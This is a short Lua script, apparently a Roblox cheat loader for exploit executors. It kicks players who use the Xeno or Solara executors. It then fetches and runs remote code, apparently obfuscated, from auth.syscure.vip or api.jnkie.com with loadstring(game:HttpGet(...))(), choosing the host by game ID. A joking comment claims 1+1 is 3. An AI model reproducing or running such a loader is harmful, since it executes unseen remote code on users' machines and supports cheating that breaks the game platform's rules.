-- did u know 1+1 is 3 

local d = identifyexecutor()

task.spawn(function()
    local e = identifyexecutor()
    local n = string.lower(e)

    if n:find("xeno") or n:find("solara") then
        game.Players.LocalPlayer:Kick("This is not a problem - We don't Support Your Executor")
    end
end)

if game.PlaceId == 70845479499574 then
    loadstring(game:HttpGet("https://auth.syscure.vip/obf/db9a99bfc5124b44e3013606953e953d.lua"))()
else
    loadstring(game:HttpGet("https://api.jnkie.com/api/v1/luascripts/public/e7da5ccc613ad180e4baeac2124054374e459aae8b766f54fd42be1e20332f5f/download"))()
end

print("tufff")
